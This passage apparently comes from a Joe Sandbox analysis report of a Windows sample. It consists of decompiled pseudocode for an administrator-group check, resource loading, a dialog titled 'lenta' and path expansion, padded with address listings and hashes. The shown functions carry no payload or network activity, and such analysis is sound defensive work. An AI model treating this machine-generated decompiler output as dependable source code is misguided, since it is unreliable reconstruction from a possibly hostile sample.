                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 80eb629a0bdfed7cc847c25389800ed53e5ba8f237b2489fff96ad146783eb00
                                                                                                                                                                                                                                                • Instruction ID: 9c40ec3978b72a92f2510212eba8db702db38b3b52002b1d42430339e5029ab8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80eb629a0bdfed7cc847c25389800ed53e5ba8f237b2489fff96ad146783eb00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5811AF31645235FBEB315B28BC0CB9A3AA4FB4B730F204611F915A51E0DF7C8662C792
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000218A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E000218A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x28004; // 0xf4950d3e
				_v8 = _t23 ^ _t53;
				_t25 =  *0x28128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00026CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E000217EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x28128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x28128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                                                                0x000218a3
                                                                                                                                                                                                                                                0x000218a3
                                                                                                                                                                                                                                                0x000218ab
                                                                                                                                                                                                                                                0x000218b2
                                                                                                                                                                                                                                                0x000218b5
                                                                                                                                                                                                                                                0x000218be
                                                                                                                                                                                                                                                0x000218c0
                                                                                                                                                                                                                                                0x000218c6
                                                                                                                                                                                                                                                0x000218c7
                                                                                                                                                                                                                                                0x000218ca
                                                                                                                                                                                                                                                0x000218cf
                                                                                                                                                                                                                                                0x000219c9
                                                                                                                                                                                                                                                0x000219d8
                                                                                                                                                                                                                                                0x000219d8
                                                                                                                                                                                                                                                0x000218df
                                                                                                                                                                                                                                                0x000219b8
                                                                                                                                                                                                                                                0x000219bd
                                                                                                                                                                                                                                                0x000219bf
                                                                                                                                                                                                                                                0x000219bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000219bd
                                                                                                                                                                                                                                                0x000218fa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021912
                                                                                                                                                                                                                                                0x000219aa
                                                                                                                                                                                                                                                0x000219ad
                                                                                                                                                                                                                                                0x000219b3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021927
                                                                                                                                                                                                                                                0x00021927
                                                                                                                                                                                                                                                0x00021932
                                                                                                                                                                                                                                                0x00021936
                                                                                                                                                                                                                                                0x000219a9
                                                                                                                                                                                                                                                0x000219a9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000219a9
                                                                                                                                                                                                                                                0x0002194c
                                                                                                                                                                                                                                                0x000219a2
                                                                                                                                                                                                                                                0x000219a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002196e
                                                                                                                                                                                                                                                0x00021970
                                                                                                                                                                                                                                                0x00021999
                                                                                                                                                                                                                                                0x0002199c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002199c
                                                                                                                                                                                                                                                0x00021972
                                                                                                                                                                                                                                                0x00021972
                                                                                                                                                                                                                                                0x00021975
                                                                                                                                                                                                                                                0x00021984
                                                                                                                                                                                                                                                0x00021985
                                                                                                                                                                                                                                                0x0002198a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002198c
                                                                                                                                                                                                                                                0x00021991
                                                                                                                                                                                                                                                0x00021996
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021996
                                                                                                                                                                                                                                                0x0002194c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000218DD), ref: 0002181A
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0002182C
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: AllocateAndInitializeSid.ADVAPI32(000218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000218DD), ref: 00021855
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: FreeSid.ADVAPI32(?,?,?,?,000218DD), ref: 00021883
                                                                                                                                                                                                                                                  • Part of subcall function 000217EE: FreeLibrary.KERNEL32(00000000,?,?,?,000218DD), ref: 0002188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000218EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 000218F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0002190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00021918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 0002192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00021944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00021964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 0002197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 0002199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 000219A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000219AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: b997b33f0915d6422ea6c8ab62005f5fe58c26146ea874cb8c5d2b55a25bfee0
                                                                                                                                                                                                                                                • Instruction ID: 6dbbc8cbc6297e6e824fbe44833be22d76c77e3e3b5289b413773a50aa87f99b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b997b33f0915d6422ea6c8ab62005f5fe58c26146ea874cb8c5d2b55a25bfee0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0316D71A00219AFEB20DFA5EC88AFFBBBCFF19300F204429E945D2150DB349946CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E0002468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                                0x00024699
                                                                                                                                                                                                                                                0x0002469b
                                                                                                                                                                                                                                                0x000246a9
                                                                                                                                                                                                                                                0x000246af
                                                                                                                                                                                                                                                0x000246b4
                                                                                                                                                                                                                                                0x000246bc
                                                                                                                                                                                                                                                0x000246f9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000246f9
                                                                                                                                                                                                                                                0x000246d9
                                                                                                                                                                                                                                                0x000246dd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000246e5
                                                                                                                                                                                                                                                0x000246ef
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000246f5
                                                                                                                                                                                                                                                0x000246ff

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: 0e6658d789b2ef2661b5c3eb524583bce256fc442edb2de36d396d761ccf2bb5
                                                                                                                                                                                                                                                • Instruction ID: 6da69853ca7d03876c537d6135debc339513ed371ea6ea309620c378a0360f63
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e6658d789b2ef2661b5c3eb524583bce256fc442edb2de36d396d761ccf2bb5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0501D1323402207BF3301BA57C4CF2B7E6CEBCBB62F150014FE4A86180CDA5884682A7
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000217EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E000217EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x28004; // 0xf4950d3e
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x2a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00026CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                                0x000217f6
                                                                                                                                                                                                                                                0x000217fd
                                                                                                                                                                                                                                                0x00021805
                                                                                                                                                                                                                                                0x0002180b
                                                                                                                                                                                                                                                0x0002180d
                                                                                                                                                                                                                                                0x00021815
                                                                                                                                                                                                                                                0x00021818
                                                                                                                                                                                                                                                0x00021820
                                                                                                                                                                                                                                                0x00021824
                                                                                                                                                                                                                                                0x0002182c
                                                                                                                                                                                                                                                0x00021832
                                                                                                                                                                                                                                                0x00021837
                                                                                                                                                                                                                                                0x00021851
                                                                                                                                                                                                                                                0x00021854
                                                                                                                                                                                                                                                0x0002185d
                                                                                                                                                                                                                                                0x00021862
                                                                                                                                                                                                                                                0x0002186c
                                                                                                                                                                                                                                                0x00021872
                                                                                                                                                                                                                                                0x00021877
                                                                                                                                                                                                                                                0x0002187e
                                                                                                                                                                                                                                                0x0002187e
                                                                                                                                                                                                                                                0x00021883
                                                                                                                                                                                                                                                0x00021883
                                                                                                                                                                                                                                                0x0002185d
                                                                                                                                                                                                                                                0x0002188a
                                                                                                                                                                                                                                                0x0002188a
                                                                                                                                                                                                                                                0x000218a2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000218DD), ref: 0002181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0002182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(000218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000218DD), ref: 00021855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,000218DD), ref: 00021883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,000218DD), ref: 0002188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: be2d02c5c08e698a464773479800c1c911da3efb17e0bf02b862307b4235636d
                                                                                                                                                                                                                                                • Instruction ID: 4fd8c58f57ca7f730a1bc1a53de01442433b19b2a01a8a5b2f6cb13002c52ce5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be2d02c5c08e698a464773479800c1c911da3efb17e0bf02b862307b4235636d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D119631F00219AFEB109FA4EC89ABEBBB8EF45700F100169FA05E2290DE359D058791
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00023450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00023450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E000243D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x29404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x291dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                                0x00023459
                                                                                                                                                                                                                                                0x0002345c
                                                                                                                                                                                                                                                0x000234d8
                                                                                                                                                                                                                                                0x000234de
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000234e0
                                                                                                                                                                                                                                                0x0002345e
                                                                                                                                                                                                                                                0x00023463
                                                                                                                                                                                                                                                0x0002349a
                                                                                                                                                                                                                                                0x000234a0
                                                                                                                                                                                                                                                0x000234a7
                                                                                                                                                                                                                                                0x000234b2
                                                                                                                                                                                                                                                0x000234c4
                                                                                                                                                                                                                                                0x000234cb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000234cb
                                                                                                                                                                                                                                                0x00023468
                                                                                                                                                                                                                                                0x0002346e
                                                                                                                                                                                                                                                0x00023474
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002347c
                                                                                                                                                                                                                                                0x0002348c
                                                                                                                                                                                                                                                0x00023490
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023496
                                                                                                                                                                                                                                                0x00023484
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023486
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023486
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00023490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0002349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000234B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 000234C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 000234CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 000234D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 50caacff4fb4d9c20fbd0341367fbe3e8b29471de8291b24be9968240f7e7e12
                                                                                                                                                                                                                                                • Instruction ID: 8aacc48e9c275a3742d155db9d7fbb5ee140e354e51ac8e4a627be6562d5e6b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50caacff4fb4d9c20fbd0341367fbe3e8b29471de8291b24be9968240f7e7e12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7501B531340134ABE73A6F65FC0C96D3A55EB06B10F204050F946965A0CB3CAF53CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00022AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E00022AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x28004; // 0xf4950d3e
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x29a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00021680(_t65, E000217C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E000265E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00021680(_t65, E000217C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00026CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                                0x00022aac
                                                                                                                                                                                                                                                0x00022ab7
                                                                                                                                                                                                                                                0x00022abc
                                                                                                                                                                                                                                                0x00022abe
                                                                                                                                                                                                                                                0x00022ac3
                                                                                                                                                                                                                                                0x00022ac6
                                                                                                                                                                                                                                                0x00022ac9
                                                                                                                                                                                                                                                0x00022ace
                                                                                                                                                                                                                                                0x00022ae6
                                                                                                                                                                                                                                                0x00022bdc
                                                                                                                                                                                                                                                0x00022bdc
                                                                                                                                                                                                                                                0x00022be0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022af2
                                                                                                                                                                                                                                                0x00022afc
                                                                                                                                                                                                                                                0x00022b00
                                                                                                                                                                                                                                                0x00022b05
                                                                                                                                                                                                                                                0x00022b05
                                                                                                                                                                                                                                                0x00022b0b
                                                                                                                                                                                                                                                0x00022bca
                                                                                                                                                                                                                                                0x00022bd1
                                                                                                                                                                                                                                                0x00022b11
                                                                                                                                                                                                                                                0x00022b18
                                                                                                                                                                                                                                                0x00022b26
                                                                                                                                                                                                                                                0x00022b99
                                                                                                                                                                                                                                                0x00022bc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022b9b
                                                                                                                                                                                                                                                0x00022bae
                                                                                                                                                                                                                                                0x00022bb3
                                                                                                                                                                                                                                                0x00022bb5
                                                                                                                                                                                                                                                0x00022bb5
                                                                                                                                                                                                                                                0x00022bb8
                                                                                                                                                                                                                                                0x00022bb8
                                                                                                                                                                                                                                                0x00022bba
                                                                                                                                                                                                                                                0x00022bbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022bb8
                                                                                                                                                                                                                                                0x00022b28
                                                                                                                                                                                                                                                0x00022b2e
                                                                                                                                                                                                                                                0x00022b33
                                                                                                                                                                                                                                                0x00022b39
                                                                                                                                                                                                                                                0x00022b3c
                                                                                                                                                                                                                                                0x00022b3c
                                                                                                                                                                                                                                                0x00022b3e
                                                                                                                                                                                                                                                0x00022b3f
                                                                                                                                                                                                                                                0x00022b55
                                                                                                                                                                                                                                                0x00022b5d
                                                                                                                                                                                                                                                0x00022b64
                                                                                                                                                                                                                                                0x00022b64
                                                                                                                                                                                                                                                0x00022b7a
                                                                                                                                                                                                                                                0x00022b7f
                                                                                                                                                                                                                                                0x00022b81
                                                                                                                                                                                                                                                0x00022b81
                                                                                                                                                                                                                                                0x00022b84
                                                                                                                                                                                                                                                0x00022b84
                                                                                                                                                                                                                                                0x00022b86
                                                                                                                                                                                                                                                0x00022b87
                                                                                                                                                                                                                                                0x00022bbf
                                                                                                                                                                                                                                                0x00022bc1
                                                                                                                                                                                                                                                0x00022bc1
